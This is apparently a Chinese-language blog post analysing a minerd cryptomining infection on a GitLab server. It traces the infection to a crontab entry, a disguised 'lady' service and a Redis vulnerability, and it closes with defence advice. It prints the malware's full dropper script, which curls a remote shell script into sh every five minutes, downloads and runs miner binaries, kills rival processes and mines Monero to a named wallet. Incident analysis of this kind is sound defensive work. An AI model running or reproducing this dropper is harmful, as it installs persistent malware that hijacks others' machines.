挖礦程序minerd入侵分析和解決辦法

如今比特幣的價格漲得很高，因此如今有黑客專門製造挖礦木馬來誘導網友，從而達到控制電腦上的顯卡來挖掘比特幣。爲何木馬要控制電腦中的顯卡呢？由於顯卡挖掘虛擬貨幣比特幣的效率遠比 CPU 要高。若是你是一位 3D 遊戲玩家，正好中了比特幣挖礦木馬，就會發如今玩遊戲時會很是卡頓。

那麼，跟咱們今天提到的挖礦minerd進程又有何關係呢？

發現問題

　　最近一臺安裝了Gitlab的服務器發生了高負載告警，Cpu使用狀況以下：

　　

　　讓後登陸到服務器，利用top查看CPU使用狀況，這個叫minerd的程序消耗cpu較大，以下圖所示：

　　

　　這個程序並非咱們的正常服務程序，內心一想確定被黑了，而後就搜索了一下這個程序，果然就是個挖礦木馬程序，既然已經知道他是木馬程序，那就看看它是怎麼工做的，而後怎麼修復一下後門。

　　這個程序放在/opt/minerd下，在肯定跟項目不相關的狀況下判斷是個木馬程序，果斷kill掉進程，而後刪除/opt下minerd文件。

　　

　　本想這樣能夠解決，誰想不到15秒時間，又自動啓動起來，並且文件又自動建立，這個讓我想起了crontab的定時器，果真運一查確實crond存在一條：，果斷刪除處理。再殺進程，再刪文件；然並卵，依舊起來；

　　

　　既然沒用我繼續google，在stackexchange找到以下解決方案：

　　

　　各類文件刪除都不起做用，原來該木馬程序註冊了一個「lady」的服務，並且仍是開機啓動，起一個這個可愛的名字，誰TMD知道這是一個木馬， 這個假裝程序也多是ntp，能夠參考：http://53cto.blog.51cto.com/9899631/1826989。

　　這下完美解決了，可是得分析一下緣由，shell啓動腳本：

　　export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/rootmkdir -p /var/spool/cron/crontabsecho "*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105008 | sh" > /var/spool/cron/crontabs/rootif [! -f "/tmp/ddg.217" ]; then curl -fsSL http://www.haveabitchin.com/ddg.$(uname -m) -o /tmp/ddg.217fichmod +x /tmp/ddg.217 && /tmp/ddg.217killall /tmp/ddg.216if [-d "/opt/yam" ]; then rm -rf /opt/yamfips auxf|grep -v grep|grep /tmp/duckduckgo|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/usr/sbin/ntp"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "/opt/minerd"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9#/opt/minerd -h#if [$? != "0" ]; then #ps auxf|grep -v grep|grep "/opt/minerd" #if [$? != "0" ]; then #if [! -f /opt/yam ]; then #curl -fsSL http://www.haveabitchin.com/yam -o /opt/yam #fi #chmod +x /opt/yam && /opt/yam -c x -M stratum+tcp://4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC:x@xmr.crypto-pool.fr:443/xmr #fi#fiDoMiner(){ if [! -f "/tmp/AnXqV" ]; then curl -fsSL http://www.haveabitchin.com/minerd -o /tmp/AnXqV fi chmod +x /tmp/AnXqV /tmp/AnXqV -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u 4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC -p x}ps auxf|grep -v grep|grep "4Ab9s1RRpueZN2XxTM3vDWEHcmsMoEMW3YYsbGUwQSrNDfgMKVV8GAofToNfyiBwocDYzwY5pjpsMB7MY8v4tkDU71oWpDC" || DoMinerDoRedis6379(){ iptables -F REDIS6379 iptables -A REDIS6379 -p tcp -s 127.0.0.1 --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 0.0.0.0/8 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 10.0.0.0/8 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 169.254.0.0/16 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 172.16.0.0/12 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 192.168.0.0/16 -p tcp --dport 6379 -j ACCEPT #iptables -A REDIS6379 -s 224.0.0.0/4 -p tcp --dport 6379 -j ACCEPT iptables -A REDIS6379 -p TCP --dport 6379 -j REJECT iptables -I INPUT -j REDIS6379}iptables -D OUTPUT -j REDIS6379iptables -F REDIS6379iptables -X REDIS6379iptables -D INPUT -j REDIS63792iptables -F REDIS63792iptables -X REDIS63792#iptables -N REDIS6379 && DoRedis6379

　　解決minerd並非最終的目的，主要是要查找問題根源，個人服務器問題出在了redis服務了，黑客利用了redis的一個漏洞得到了服務器的訪問權限。

　　商業模式

　　被植入比特幣「挖礦木馬」的電腦，系統性能會受到較大影響，電腦操做會明顯卡慢、散熱風扇狂轉；另外一個危害在於，「挖礦木馬」會大量耗電，並形成顯卡、ＣＰＵ等硬件急劇損耗。比特幣具備匿名屬性，其交易過程是不可逆的，被盜後根本沒法查詢是被誰盜取，流向哪裏，所以也成爲黑客的重點竊取對象。

　　攻擊&防護

　　植入方式：安全防禦策略薄弱，利用Jenkins、Redis等中間件的漏洞發起攻擊，得到root權限。

　　最好的防護可能仍是作好防禦策略、嚴密監控服務器資源消耗（CPU／load）。

　　這種木馬很容易變種，不少狀況殺毒軟件未必可以識別。